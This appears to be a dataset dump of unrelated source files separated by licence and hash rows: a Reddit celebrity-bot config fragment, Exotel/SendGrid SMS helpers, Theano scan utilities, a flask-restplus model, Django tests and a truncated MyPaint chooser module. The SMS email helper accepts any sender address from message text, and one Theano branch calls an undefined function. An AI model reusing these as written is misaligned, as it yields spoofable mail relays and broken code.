{FrostSisters: FrostSistersReply}, {TaylorHannum: TaylorHannumReply}, {CaraDelevingne: CaraDelevingneReply}, {LenaGercke: LenaGerckeReply},\
{JenniferMorrison: JenniferMorrisonReply}, {MargotRobbie: MargotRobbieReply}, {AlyssaArce: AlyssaArceReply}, {MirandaKerr: MirandaKerrReply},\
{KarlieKloss: KarlieKlossReply}, {ElsaHosk: ElsaHoskReply}, {CandiceSwanepoel: CandiceSwanepoelReply}, {MeganFox: MeganFoxReply},\
{IzzyMarshall: IzzyMarshallReply}, {ArianaGrande: ArianaGrandeReply}, {NathalieEmmanuel: NathalieEmmanuelReply}, {HannahFerguson: HannahFergusonReply}\
{KateHudson: KateHudsonReply}, {NinaDobrev: NinaDobrevReply}, {DaphneJoy: DaphneJoyReply}, {EmilyRudd: EmilyRuddReply}, {OliviaCulpo: OliviaCulpoReply},\
{OdetteAnnable: OdetteAnnableReply}, {OlgaKurylenko: OlgaKurylenkoReply}, {CarolSeleme: CarolSelemeReply}, {AlessandraAmbrosio: AlessandraAmbrosioReply},\
{AlexSchmidt: AlexSchmidtReply}, {RachelHilbert: RachelHilbertReply}, {DevonWindsor: DevonWindsorReply}, {TaylorMarieHill: TaylorMarieHillReply},\
{KateMara: KateMaraReply}, {ChloeGraceMortz: ChloeGraceMortzReply}, {CamilleRowe: CamilleRoweReply}, {SammiHanratty: SammiHanrattyReply},\
{MargotRobbie: MargotRobbieReply}, {LaurenCohan: LaurenCohanReply}, {CamilaCabello: CamilaCabelloReply}, {YvonneStrahovski: YvonneStrahovskiReply},\
{OliviaMunn: OliviaMunnReply}, {KatharineMcphee: KatharineMcpheeReply}, {EmmaRoberts: EmmaRobertsReply}, {SalmaHayek: SalmaHayekReply},\
{KatyaEliseHenry: KatyaEliseHenryReply}, {ElizabethGillies: ElizabethGilliesReply}, {MichelleJenneke: MichelleJennekeReply}, {GwenCox: GwenCoxReply},\
{DakotaJohnson: DakotaJohnsonReply}, {CamillaLuddington: CamillaLuddingtonReply}, {JennaHopkins: JennaHopkinsReply}, {PriscillaQuintana: PriscillaQuintanaReply},\
{RachaelFinch: RachaelFinchReply}, {RachaelTaylor: RachaelTaylorReply}, {ElisabettaCanalis: ElisabettaCanalisReply}, {SolveigMorkHansen: SolveigMorkHansenReply}\
{AlyssaMilano: AlyssaMilanoReply}, {FrancoiseBoufhal: FrancoiseBoufhalReply}, {KimberleyGarner: KimberleyGarnerReply}, {CarlyCraig: CarlyCraigReply},\
{KarolinaKurkova: KarolinaKurkovaReply}, {LindsayHeyser: LindsayHeyserReply}, {RachelHurdWood: RachelHurdWoodReply}, {TiannaGregory: TiannaGregoryReply},\
{PaigeSpiranac: PaigeSpiranacReply}, {GeorgiaMayJagger: GeorgiaMayJaggerReply}, {BrookeBurke: BrookeBurkeReply}, {SydneyFullerMarr: SydneyFullerMarrReply},\
{ {JennaJenovich: JennaJenovichReply}, {OliviaJordan: OliviaJordanReply}, {HannahPolites: HannahPolitesReply}, {DeniseMilani: DeniseMilaniReply}, {KatherineTimokhina: KatherineTimokhinaReply},
#In this string put all+your+target_subreddits:
subreddits_string = "celeb_username_bot+Celeb_Bot_Test+DrewsephA"
#When the script is ready delete the above two lines and remove the "#" from the line below
#subreddits_string = "Celebs+CelebGfys+celebgifs+CelebsWallpaper+goddesses+VSModels+vsangels+Models+PrettyGirls+GirlswithGlasses+GirlswithGreenEyes+GirlswithWetHair+VictoriaSecret+VictoriasSecret+VSfans+WtSSTaDaMiT+starlets+girlsinyogapants+girlsinyogashorts+BeautifulFemales"
''' ---------------------------------------------------------------------------------------------------------------- '''
|
gpl-2.0
| 5,112,249,427,415,677,000
| 53.891648
| 276
| 0.689333
| false
| 2.353334
| false
| false
| false
|
mascot6699/Hackapi-Demo
|
src/core/utils.py
|
1
|
3280
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pprint import pprint
import requests
from django.conf import settings
from PyDictionary import PyDictionary
import wikipedia
import sendgrid
sid = settings.EXOTEL_SID
token = settings.EXOTEL_TOKEN
api = settings.SENDGRID_API_TOKEN
def send_message(sid, token, sms_from, sms_to, sms_body):
return requests.post('https://twilix.exotel.in/v1/Accounts/{sid}/Sms/send.json'.format(sid=sid),
auth=(sid, token),
data={
'From': sms_from,
'To': sms_to,
'Body': sms_body
})
if __name__ == '__main__':
r = send_message(sid, token,
sms_from='8050248326', # sms_from='8808891988',
sms_to='8050248326', # sms_to='9052161119',
sms_body='Some message is sent')
print r.status_code
pprint(r.json())
def process_wiki(word):
return wikipedia.summary(word)
def process_dictionary(word):
meaning = "You searched for the word {}. "
dictionary = PyDictionary(word)
our_meaning = dictionary.getMeanings()
meaning = meaning.format(our_meaning.keys()[0])
l = zip(our_meaning.values()[0].keys(),our_meaning.values()[0].values()[0])
for idx in l:
meaning += idx[0] + ":" + idx[1] + ", "
return meaning[:-1]
def custom_send_email(msg):
msg = msg.split(' ')
from_email = msg[0]
to_email = msg[1]
body = " ".join(msg[2:])
sg = sendgrid.SendGridClient(api)
message = sendgrid.Mail(to=to_email, subject="Urgent Emails", text=body, from_email=from_email)
status, msg = sg.send(message)
print "status", status
print "msg" ,msg
if status==200:
return "Email has been sent!"
else:
return "Email sending is delayed we are on it!"
return " "
def connect_customer(sid, token, customer_no, exotel_no, callerid, url, timelimit=None, timeout=None, calltype="trans",
callback_url=None):
return requests.post('https://twilix.exotel.in/v1/Accounts/{sid}/Calls/connect.json'.format(sid=sid),
auth=(sid, token),
data={
'From': customer_no,
'To': exotel_no,
'CallerId': callerid,
'Url': url,
'TimeLimit': timelimit,
'TimeOut': timeout,
'CallType': calltype,
'StatusCallback': callback_url
})
if __name__ == '__main__':
r = connect_customer(
sid, token,
customer_no="<Your-Customer's-Number>",
exotel_no="<Your-Exotel-Landline-or-Mobile>",
callerid="<Your-Exotel-virtual-number>",
url="http://my.exotel.in/exoml/start/<flow_id>",
timelimit="<time-in-seconds>", # This is optional
timeout="<time-in-seconds>", # This is also optional
calltype="trans", # Can be "trans" for transactional and "promo" for promotional content
callback_url="<http//: your company URL>" # This is also also optional
)
print r.status_code
pprint(r.json())
def get_help():
message = "8050248326 email from_email to_email body \n" \
"8050248326 dictionary term_to_search \n" \
"8050248326 wiki thing_to_search_in_wiki \n" \
"8050248326 song requested_song \n"
print message
return message
|
mit
| -5,266,229,043,800,101,000
| 30.854369
| 119
| 0.601524
| false
| 3.340122
| false
| false
| false
|
nke001/attention-lvcsr
|
libs/Theano/theano/sandbox/scan_module/scan_utils.py
|
1
|
16116
|
"""
This module provides utility functions for the Scan Op
See scan.py for details on scan
"""
from __future__ import print_function
__docformat__ = 'restructedtext en'
__authors__ = ("Razvan Pascanu "
"Frederic Bastien "
"James Bergstra "
"Pascal Lamblin "
"Arnaud Bergeron")
__copyright__ = "(c) 2010, Universite de Montreal"
__contact__ = "Razvan Pascanu <r.pascanu@gmail>"
import copy
import logging
import warnings
import numpy
from six.moves import xrange
import theano
from theano.compat import izip
from theano.compile.pfunc import rebuild_collect_shared
from theano import gof
from theano import tensor, scalar
from theano.tensor.basic import get_scalar_constant_value
# Logging function for sending warning or info
_logger = logging.getLogger('theano.scan_utils')
def expand(tensor_var, size):
"""
Given ``tensor_var``, a Theano tensor of shape (d1, d2, ..), this
function constructs a rval Theano tensor of shape (d1 + size, d2, ..)
filled with 0s, except the first d1 entries which are taken from
``tensor_var``, namely:
rval[:d1] = tensor_var
:param tensor_var: Theano tensor variable
:param size: int
"""
# Corner case that I might use in an optimization
if size == 0:
return tensor_var
shapes = [tensor_var.shape[x] for x in xrange(tensor_var.ndim)]
zeros_shape = [size + shapes[0]] + shapes[1:]
empty = tensor.zeros(zeros_shape,
dtype=tensor_var.dtype)
return tensor.set_subtensor(empty[:shapes[0]], tensor_var)
def to_list(ls):
"""
Converts ``ls`` to list if it is a tuple, or wraps ``ls`` into a list if
it is not a list already
"""
if isinstance(ls, (list, tuple)):
return list(ls)
else:
return [ls]
class until(object):
"""
Theano can end on a condition. In order to differentiate this condition
from the other outputs of scan, this class is used to wrap the condition
around it.
"""
def __init__(self, condition):
self.condition = tensor.as_tensor_variable(condition)
assert self.condition.ndim == 0
def get_updates_and_outputs(ls):
"""
Parses the list ``ls`` into outputs and updates. The semantics
of ``ls`` is defined by the constructive function of scan.
The elemets of ``ls`` are either a list of expressions representing the
outputs/states, a dictionary of updates or a condition.
"""
def is_list_outputs(elem):
if (isinstance(elem, (list, tuple)) and
all([isinstance(x, theano.Variable) for x in elem])):
return True
if isinstance(elem, theano.Variable):
return True
return False
def is_updates(elem):
if isinstance(elem, dict):
return True
# Dictionaries can be given as lists of tuples
if (isinstance(elem, (list, tuple)) and
all([isinstance(x, (list, tuple)) and len(x) == 2
for x in elem])):
return True
return False
def is_condition(elem):
return isinstance(elem, until)
if is_list_outputs(ls):
return None, to_list(ls), {}
if is_updates(ls):
return None, [], dict(ls)
if not isinstance(ls, (list, tuple)):
raise ValueError(('Scan can not parse the return value'
' of your constructive function given to scan'))
ls = list(ls)
deprecation_msg = ('The return value of the lambda function'
' has been restricted. you have to always return first the'
' outputs (if any), afterwards the updates (if any) and'
' at the end the condition')
error_msg = ('Scan can not parse the return value of your constructive '
'funtion given to scan')
if len(ls) == 2:
if is_list_outputs(ls[0]):
if is_updates(ls[1]):
return (None, to_list(ls[0]), dict(ls[1]))
elif is_condition(ls[1]):
return (ls[1].condition, to_list(ls[0]), {})
else:
raise ValueError(error_msg)
elif is_updates(ls[0]):
if is_outputs(ls[1]):
raise ValueError(deprecation_msg)
elif is_condition(ls[1]):
return (ls[1].condition, [], dict(ls[0]))
else:
raise ValueError(error_msg)
else:
raise ValueError(error_msg)
elif len(ls) == 3:
if is_outputs(ls[0]):
if is_updates(ls[1]):
if is_condition(ls[2]):
return (ls[2].condition, to_list(ls[0]), dict(ls[1]))
else:
raise ValueError(error_msg)
else:
raise ValueError(error_msg)
else:
raise ValueError(error_msg)
def clone(output, replace=None, strict=True, share_inputs=True):
"""
Function that allows replacing subgraphs of a computational
graph. It returns a copy of the initial subgraph with the corresponding
substitutions.
:type output: Theano Variables (or Theano expressions)
:param outputs: Theano expression that represents the computational
graph
:type replace: dict
:param replace: dictionary describing which subgraphs should be
replaced by what
:type share_inputs: bool
:param share_inputs: If True, use the same inputs (and shared variables)
as the original graph. If False, clone them. Note that cloned
shared variables still use the same underlying storage, so they
will always have the same value.
"""
inps, outs, other_stuff = rebuild_collect_shared(output,
[],
replace,
[],
strict,
share_inputs)
return outs
def canonical_arguments(sequences,
outputs_info,
non_sequences,
go_backwards,
n_steps):
"""
This re-writes the arguments obtained from scan into a more friendly
form for the scan_op.
Mainly it makes sure that arguments are given as lists of dictionaries,
and that the different fields of of a dictionary are set to default
value if the user has not provided any.
"""
states_info = to_list(outputs_info)
parameters = [tensor.as_tensor_variable(x) for x in to_list(non_sequences)]
inputs = []
if n_steps is not None:
negative_n_steps = tensor.lt(tensor.as_tensor_variable(n_steps), 0)
for input in to_list(sequences):
if not isinstance(input, dict):
nw_input = tensor.as_tensor_variable(input)
if go_backwards:
nw_input = nw_input[::-1]
if n_steps is not None:
nw_input = tensor.switch(negative_n_steps, nw_input[::-1],
nw_input)
inputs.append(tensor.as_tensor_variable(nw_input))
elif input.get('taps', True) is None:
nw_input = tensor.as_tensor_variable(input['input'])
if go_backwards:
nw_input = nw_input[::-1]
if n_steps is not None:
nw_input = tensor.switch(negative_n_steps, nw_input[::-1],
nw_input)
inputs.append(nw_input)
elif input.get('taps', None):
mintap = numpy.min(input['taps'])
maxtap = numpy.max(input['taps'])
orig_input = tensor.as_tensor_variable(input['input'])
if go_backwards:
orig_input = orig_input[::-1]
if n_steps is not None:
orig_input = tensor.switch(negative_n_steps, orig_input[::-1],
orig_input)
for k in input['taps']:
# We cut the sequence such that seq[i] to correspond to
# seq[i-k]
if maxtap < 0:
offset_max = abs(maxtap)
else:
offset_max = 0
if mintap < 0:
offset_min = abs(mintap)
else:
offset_min = 0
nw_input = orig_input
if maxtap == mintap and maxtap != 0:
if maxtap > 0:
nw_input = nw_input[maxtap:]
else:
nw_input = nw_input[:maxtap]
else:
st = k + offset_min
if maxtap > 0:
ed = - (maxtap + offset_min - st)
else:
ed = - (offset_min - st)
if ed != 0:
nw_input = nw_input[st:ed]
else:
nw_input = nw_input[st:]
inputs.append(nw_input)
else:
raise ValueError('Provided sequence makes no sense', str(input))
# Since we've added all sequences now we need to level them up based on
# n_steps or their different shapes
if n_steps is None:
if len(inputs) == 0:
# No information about the number of steps
raise ValueError('You need to provide either at least '
'one sequence over which scan should loop '
'or a number of steps for scan to loop. '
'Neither of the two had been provided !')
T = inputs[0].shape[0]
for input in inputs[1:]:
T = tensor.minimum(T, input.shape[0])
else:
T = abs(tensor.as_tensor(n_steps))
# Level up sequences
inputs = [input[:T] for input in inputs]
# wrap outputs info in a dictionary if they are not already in one
for i, state in enumerate(states_info):
if state is not None and not isinstance(state, dict):
states_info[i] = dict(initial=tensor.as_tensor_variable(state),
taps=[-1])
elif isinstance(state, dict):
if not state.get('initial', None) and state.get('taps', None):
raise ValueError(('If you are using slices of an output '
'you need to provide a initial state '
'for it'), state)
elif state.get('initial', None) and not state.get('taps', None):
# initial state but taps not provided
if 'taps' in state:
# explicitly provided a None for taps
_logger.warning(
('Output %s ( index %d) has a initial '
'state but taps is explicitly set to None '),
getattr(states_info[i]['initial'], 'name', 'None'), i)
states_info[i]['taps'] = [-1]
states_info[i]['initial'] = \
tensor.as_tensor_variable(state['initial'])
elif state.get('initial', None):
states_info[i]['initial'] = \
tensor.as_tensor_variable(state['initial'])
else:
# if a None is provided as the output info we replace it
# with an empty dict() to simplify handling
states_info[i] = dict()
return inputs, states_info, parameters, T
def infer_shape(outs, inputs, input_shapes):
'''
Compute the shape of the outputs given the shape of the inputs
of a theano graph.
We do it this way to avoid compiling the inner function just to get
the shape. Changes to ShapeFeature could require changes in this function.
'''
# We use a ShapeFeature because it has all the necessary logic
# inside. We don't use the full ShapeFeature interface, but we
# let it initialize itself with an empty fgraph, otherwise we will
# need to do it manually
for inp, inp_shp in izip(inputs, input_shapes):
if inp_shp is not None and len(inp_shp) != inp.ndim:
assert len(inp_shp) == inp.ndim
shape_feature = tensor.opt.ShapeFeature()
shape_feature.on_attach(theano.gof.FunctionGraph([], []))
# Initialize shape_of with the input shapes
for inp, inp_shp in izip(inputs, input_shapes):
shape_feature.set_shape(inp, inp_shp)
def local_traverse(out):
'''
Go back in the graph, from out, adding computable shapes to shape_of.
'''
if out in shape_feature.shape_of:
# Its shape is already known
return
elif out.owner is None:
# This is an input of the graph
shape_feature.init_r(out)
else:
# Recurse over inputs
for inp in out.owner.inputs:
if not inp in shape_feature.shape_of:
local_traverse(inp)
# shape_feature.on_import does not actually use an fgraph
# It will call infer_shape and set_shape appropriately
dummy_fgraph = None
shape_feature.on_import(dummy_fgraph, out.owner, reason="dummy")
ret = []
for o in outs:
local_traverse(o)
ret.append(shape_feature.shape_of[o])
return ret
def allocate_memory(T, y_info, y):
"""
Allocates memory for an output of scan.
:param T: scalar
Variable representing the number of steps scan will run
:param y_info: dict
Dictionary describing the output (more specifically describing shape
information for the output
:param y: Tensor variable
Expression describing the computation resulting in out entry of y.
It can be used to infer the shape of y
"""
if 'shape' in y_info:
return tensor.zeros([T, ] + list(y_info['shape']),
dtype=y.dtype)
else:
inputs = gof.graph.inputs([y])
ins_shapes = []
for inp in inputs:
in_shape = [inp.shape[k] for k in xrange(inp.ndim)]
ins_shapes.append(in_shape)
shape = infer_shape([y], inputs, ins_shapes)[0]
return tensor.zeros([T, ] + shape, dtype=y.dtype)
class ScanPermutation(gof.Op):
def __init__(self, mintap=0, inplace=False):
self.inplace = inplace
self.mintap = mintap
if inplace:
self.destroy_map = {0: [0]}
def __eq__(self, other):
return type(self) == type(other) and self.inplace == other.inplace
def __hash__(self):
return hash(type(self)) ^ hash(self.inplace)
def __str__(self):
if self.inplace:
return "scan_permutation{inplace}"
else:
return "scan_permutation"
def make_node(self, membuffer, index):
# index has to be a scalar
assert index.ndim == 0
# we neeed at least one dimension
assert membuffer.ndim > 0
return gof.Apply(self, [membuffer, index], [membuffer.type()])
def perform(self, node, inputs, outputs):
membuffer = inputs[0]
index = inputs[1] + self.mintap
out = outputs[0]
if index % membuffer.shape[0] == 0:
if self.inplace:
out[0] = membuffer
else:
out[0] = membuffer.copy()
else:
pos = index % membuffer.shape[0]
if outputs[0] is membuffer:
membuffer = membuffer.copy()
print(pos)
out[0][:membuffer.shape[0] - pos] = membuffer[pos:]
out[0][membuffer.shape[0] - pos:] = membuffer[:pos]
def R_op(self, inputs, eval_points):
if eval_points[0] is None:
return [None]
return self.make_node(eval_points[0], inputs[1]).outputs
def grad(self, inputs, grads):
pos = inputs[0].shape[0] - (inputs[1] % inputs[0].shape[0])
return self.make_node(grads[0], pos).outputs
|
mit
| 8,171,401,141,584,045,000
| 36.2194
| 79
| 0.548089
| false
| 4.206735
| false
| false
| false
|
luminusnetworks/flask-restplus
|
flask_restplus/model.py
|
1
|
3749
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import copy
import re
from collections import MutableMapping
from six import iteritems, itervalues
from werkzeug import cached_property
from flask.ext.restful import abort
from jsonschema import Draft4Validator
from jsonschema.exceptions import ValidationError
from .utils import not_none
RE_REQUIRED = re.compile(r'u?\'(?P<name>.*)\' is a required property', re.I | re.U)
def instance(cls):
if isinstance(cls, type):
return cls()
return cls
class ApiModel(dict, MutableMapping):
'''A thin wrapper on dict to store API doc metadata'''
def __init__(self, *args, **kwargs):
self.__apidoc__ = {}
self.__parent__ = None
super(ApiModel, self).__init__(*args, **kwargs)
@cached_property
def resolved(self):
'''
Resolve real fields before submitting them to upstream restful marshal
'''
# Duplicate fields
resolved = copy.deepcopy(self)
# Recursively copy parent fields if necessary
if self.__parent__:
resolved.update(self.__parent__.resolved)
# Handle discriminator
candidates = [f for f in itervalues(resolved) if getattr(f, 'discriminator', None)]
# Ensure the is only one discriminator
if len(candidates) > 1:
raise ValueError('There can only be one discriminator by schema')
# Ensure discriminator always output the model name
elif len(candidates) == 1:
candidates[0].default = self.__apidoc__['name']
return resolved
@property
def ancestors(self):
'''
Return the ancestors tree
'''
return self.__parent__.tree
@cached_property
def tree(self):
'''
Return the inheritance tree
'''
tree = [self.__apidoc__['name']]
return self.ancestors + tree if self.__parent__ else tree
@property
def name(self):
return self.__apidoc__['name']
def get_parent(self, name):
if self.name == name:
return self
elif self.__parent__:
return self.__parent__.get_parent(name)
else:
raise ValueError('Parent ' + name + ' not found')
@cached_property
def __schema__(self):
properties = {}
required = set()
discriminator = None
for name, field in iteritems(self):
field = instance(field)
properties[name] = field.__schema__
if field.required:
required.add(name)
if getattr(field, 'discriminator', False):
discriminator = name
schema = not_none({
'required': sorted(list(required)) or None,
'properties': properties,
'discriminator': discriminator,
})
if self.__parent__:
return {
'allOf': [
{'$ref': '#/definitions/{0}'.format(self.__parent__.name)},
schema
]
}
else:
return schema
def validate(self, data, resolver=None):
validator = Draft4Validator(self.__schema__, resolver=resolver)
try:
validator.validate(data)
except ValidationError:
abort(400, message='Input payload validation failed',
errors=dict(self.format_error(e) for e in validator.iter_errors(data)))
def format_error(self, error):
path = list(error.path)
if error.validator == 'required':
name = RE_REQUIRED.match(error.message).group('name')
path.append(name)
key = '.'.join(str(p) for p in path)
return key, error.message
|
mit
| 9,132,711,310,193,059,000
| 28.289063
| 91
| 0.572153
| false
| 4.538741
| false
| false
| false
|
sthzg/django-chatterbox
|
chatterbox/tests/test_events.py
|
1
|
3069
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.test.testcases import SimpleTestCase
from chatterbox.events import BaseChatterboxEvent
from .helpers import MailEventDummyClass, get_test_dict
class BaseChatterboxTests(SimpleTestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_add_template(self):
""" ``add_template()`` stores passed values as expected.
"""
be = BaseChatterboxEvent()
be.add_template('foo', 'chatterbox_tests/empty_foo.html')
be.add_template('bam', 'chatterbox_tests/empty_bar.html')
self.assertEqual(len(be.templates), 2)
self.assertTrue('foo' in be.templates)
self.assertTrue('bam' in be.templates)
self.assertTrue(be.templates.get('foo') == 'chatterbox_tests/empty_foo.html') # NOQA
def test_add_token(self):
""" ``add_token`` yields the expected data structure.
"""
be = BaseChatterboxEvent()
be.add_token('bam', 'baz')
be.add_token('actor.foo', 42)
be.add_token('bar.baz.boo.jap', 'jahu')
self.assertEqual(be._tokens['bam'], 'baz')
self.assertEqual(be._tokens['actor']['foo'], 42)
self.assertEqual(be._tokens['bar']['baz']['boo']['jap'], 'jahu')
def test_add_nested_token_on_leaf_raises(self):
# TODO(sthzg) implement
# be = BaseChatterboxEvent()
# be.add_token('bam', 'baz')
# be.add_token('bam.foo', 42)
pass
def test_build_tokens_with_dict(self):
""" ``build_tokens()`` resolves variables on current scope correctly.
"""
be = BaseChatterboxEvent()
be.actor = get_test_dict()
be.token_fields = ('actor.foo', 'actor.bar.eggs', 'actor.bar',)
be.build_tokens()
tokens = be._tokens
self.assertEqual(tokens['actor']['foo'], 'ham')
self.assertTrue(isinstance(tokens['actor']['bar'], dict))
self.assertEqual(tokens['actor']['bar']['juice'], False)
self.assertEqual(tokens['actor']['bar']['eggs'], True)
class ChatterboxMailEventTests(SimpleTestCase):
def setUp(self):
self.template_subject = 'chatterbox_tests/email_subject.html'
self.template_body = 'chatterbox_tests/email_body.html'
def tearDown(self):
pass
def test_class_members(self):
""" various behavioral basics work as expected. Might later be split
into smaller and more fragmented test cases.
"""
chatter = MailEventDummyClass()
self.assertEqual(chatter.originator, 'chatterbox_tests')
self.assertEqual(chatter.event, 'Stephan runs unit tests')
self.assertEqual(chatter.mail_from, 'foo@example.com')
self.assertEqual(chatter.mail_to, 'bar@example.com')
self.assertEqual(chatter.template_subject, self.template_subject)
self.assertEqual(chatter.template_body, self.template_body)
self.assertTrue('subject' in chatter.templates)
self.assertTrue('body' in chatter.templates)
|
mit
| -7,214,503,491,187,462,000
| 36.426829
| 93
| 0.633105
| false
| 3.72904
| true
| false
| false
|
dothiko/mypaint
|
gui/quickchoice.py
|
1
|
11387
|
# This file is part of MyPaint.
# Copyright (C) 2013 by Andrew Chadwick <a.t.chadwick@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""Widgets and popup dialogs for making quick choices"""
## Imports
import abc
import gi
from gi.repository import Gtk
from gi.repository import Gdk
from pixbuflist import PixbufList
import brushmanager
import widgets
import spinbox
import windowing
from lib.observable import event
import gui.colortools
## Module consts
_DEFAULT_PREFS_ID = u"default"
## Interfaces
class Advanceable:
"""Interface for choosers which can be advanced by pressing keys.
Advancing happens if the chooser is already visible and its key is
pressed again. This can happen repeatedly. The actual action
performed is up to the implementation: advancing some some choosers
may move them forward through pages of alternatives, while other
choosers may actually change a brush setting as they advance.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def advance(self):
"""Advances the chooser to the next page or choice.
Choosers should remain open when their advance() method is
invoked. The actual action performed is up to the concrete
implementation: see the class docs.
"""
## Class defs
class QuickBrushChooser (Gtk.VBox):
"""A quick chooser widget for brushes"""
## Class constants
_PREFS_KEY_TEMPLATE = u"brush_chooser.%s.selected_group"
ICON_SIZE = 48
## Method defs
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID):
"""Initialize"""
Gtk.VBox.__init__(self)
self.app = app
self.bm = app.brushmanager
self._prefs_key = self._PREFS_KEY_TEMPLATE % (prefs_id,)
active_group_name = app.preferences.get(self._prefs_key, None)
model = self._make_groups_sb_model()
self.groups_sb = spinbox.ItemSpinBox(model, self._groups_sb_changed_cb,
active_group_name)
active_group_name = self.groups_sb.get_value()
brushes = self.bm.groups[active_group_name][:]
self.brushlist = PixbufList(brushes, self.ICON_SIZE, self.ICON_SIZE,
namefunc=lambda x: x.name,
pixbuffunc=lambda x: x.preview)
self.brushlist.dragging_allowed = False
self.bm.groups_changed += self._update_groups_sb
self.brushlist.item_selected += self._item_selected_cb
scrolledwin = Gtk.ScrolledWindow()
scrolledwin.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.ALWAYS)
scrolledwin.add_with_viewport(self.brushlist)
w = int(self.ICON_SIZE * 4.5)
h = int(self.ICON_SIZE * 5.0)
scrolledwin.set_min_content_width(w)
scrolledwin.set_min_content_height(h)
scrolledwin.get_child().set_size_request(w, h)
self.pack_start(self.groups_sb, False, False)
self.pack_start(scrolledwin, True, True)
self.set_spacing(widgets.SPACING_TIGHT)
def _item_selected_cb(self, pixbuf_list, brush):
"""Internal: call brush_selected event when an item is chosen"""
self.brush_selected(brush)
@event
def brush_selected(self, brush):
"""Event: a brush was selected
:param brush: The newly chosen brush
"""
def _make_groups_sb_model(self):
"""Internal: create the model for the group choice spinbox"""
group_names = self.bm.groups.keys()
group_names.sort()
model = []
for name in group_names:
label_text = brushmanager.translate_group_name(name)
model.append((name, label_text))
return model
def _update_groups_sb(self, bm):
"""Internal: update the spinbox model at the top of the widget"""
model = self._make_groups_sb_model()
self.groups_sb.set_model(model)
def _groups_sb_changed_cb(self, group_name):
"""Internal: update the list of brush icons when the group changes"""
self.app.preferences[self._prefs_key] = group_name
self.brushlist.itemlist[:] = self.bm.groups[group_name][:]
self.brushlist.update()
def advance(self):
"""Advances to the next page of brushes."""
self.groups_sb.next()
class BrushChooserPopup (windowing.ChooserPopup):
"""Speedy brush chooser popup"""
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID):
"""Initialize.
:param gui.application.Application app: main app instance
:param unicode prefs_id: prefs identifier for the chooser
The prefs identifier forms part of preferences key which store
layout and which page of the chooser is selected. It should
follow the same syntax rules as Python simple identifiers.
"""
windowing.ChooserPopup.__init__(
self,
app = app,
actions = [
'ColorChooserPopup',
'ColorChooserPopupFastSubset',
'BrushChooserPopup',
],
config_name = "brush_chooser.%s" % (prefs_id,),
)
self._chosen_brush = None
self._chooser = QuickBrushChooser(app, prefs_id=prefs_id)
self._chooser.brush_selected += self._brush_selected_cb
bl = self._chooser.brushlist
bl.connect("button-release-event", self._brushlist_button_release_cb)
self.add(self._chooser)
def _brush_selected_cb(self, chooser, brush):
"""Internal: update the response brush when an icon is clicked"""
self._chosen_brush = brush
def _brushlist_button_release_cb(self, *junk):
"""Internal: send an accept response on a button release
We only send the response (and close the dialog) on button release to
avoid accidental dabs with the stylus.
"""
if self._chosen_brush is not None:
bm = self.app.brushmanager
bm.select_brush(self._chosen_brush)
self.hide()
self._chosen_brush = None
def advance(self):
"""Advances to the next page of brushes."""
self._chooser.advance()
class QuickColorChooser (Gtk.VBox):
"""A quick chooser widget for colors"""
## Class constants
_PREFS_KEY_TEMPLATE = u"color_chooser.%s.selected_adjuster"
_ALL_ADJUSTER_CLASSES = [
gui.colortools.HCYWheelTool,
gui.colortools.HSVWheelTool,
gui.colortools.PaletteTool,
gui.colortools.HSVCubeTool,
gui.colortools.HSVSquareTool,
gui.colortools.ComponentSlidersTool,
gui.colortools.RingsColorChangerTool,
gui.colortools.WashColorChangerTool,
gui.colortools.CrossedBowlColorChangerTool,
]
_SINGLE_CLICK_ADJUSTER_CLASSES = [
gui.colortools.PaletteTool,
gui.colortools.WashColorChangerTool,
gui.colortools.CrossedBowlColorChangerTool,
]
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID, single_click=False):
Gtk.VBox.__init__(self)
self._app = app
self._spinbox_model = []
self._adjs = {}
self._pages = []
mgr = app.brush_color_manager
if single_click:
adjuster_classes = self._SINGLE_CLICK_ADJUSTER_CLASSES
else:
adjuster_classes = self._ALL_ADJUSTER_CLASSES
for page_class in adjuster_classes:
name = page_class.__name__
page = page_class()
self._pages.append(page)
self._spinbox_model.append((name, page.tool_widget_title))
self._adjs[name] = page
page.set_color_manager(mgr)
if page_class in self._SINGLE_CLICK_ADJUSTER_CLASSES:
page.connect_after(
"button-release-event",
self._ccwidget_btn_release_cb,
)
self._prefs_key = self._PREFS_KEY_TEMPLATE % (prefs_id,)
active_page = app.preferences.get(self._prefs_key, None)
sb = spinbox.ItemSpinBox(self._spinbox_model, self._spinbox_changed_cb,
active_page)
active_page = sb.get_value()
self._spinbox = sb
self._active_adj = self._adjs[active_page]
self.pack_start(sb, False, False, 0)
self.pack_start(self._active_adj, True, True, 0)
self.set_spacing(widgets.SPACING_TIGHT)
def _spinbox_changed_cb(self, page_name):
self._app.preferences[self._prefs_key] = page_name
self.remove(self._active_adj)
new_adj = self._adjs[page_name]
self._active_adj = new_adj
self.pack_start(self._active_adj, True, True, 0)
self._active_adj.show_all()
def _ccwidget_btn_release_cb(self, ccwidget, event):
"""Internal: fire "choice_completed" after clicking certain widgets"""
self.choice_completed()
return False
@event
def choice_completed(self):
"""Event: a complete selection was made
This is emitted by button-release events on certain kinds of colour
chooser page. Not every page in the chooser emits this event, because
colour is a three-dimensional quantity: clicking on a two-dimensional
popup can't make a complete choice of colour with most pages.
The palette page does emit this event, and it's the default.
"""
def advance(self):
"""Advances to the next color selector."""
self._spinbox.next()
class ColorChooserPopup (windowing.ChooserPopup):
"""Speedy color chooser dialog"""
def __init__(self, app, prefs_id=_DEFAULT_PREFS_ID, single_click=False):
"""Initialize.
:param gui.application.Application app: main app instance
:param unicode prefs_id: prefs identifier for the chooser
:param bool single_click: limit to just the single-click adjusters
The prefs identifier forms part of preferences key which store
layout and which page of the chooser is selected. It should
follow the same syntax rules as Python simple identifiers.
"""
windowing.ChooserPopup.__init__(
self,
app = app,
actions = [
'ColorChooserPopup',
'ColorChooserPopupFastSubset',
'BrushChooserPopup',
],
config_name = u"color_chooser.%s" % (prefs_id,),
)
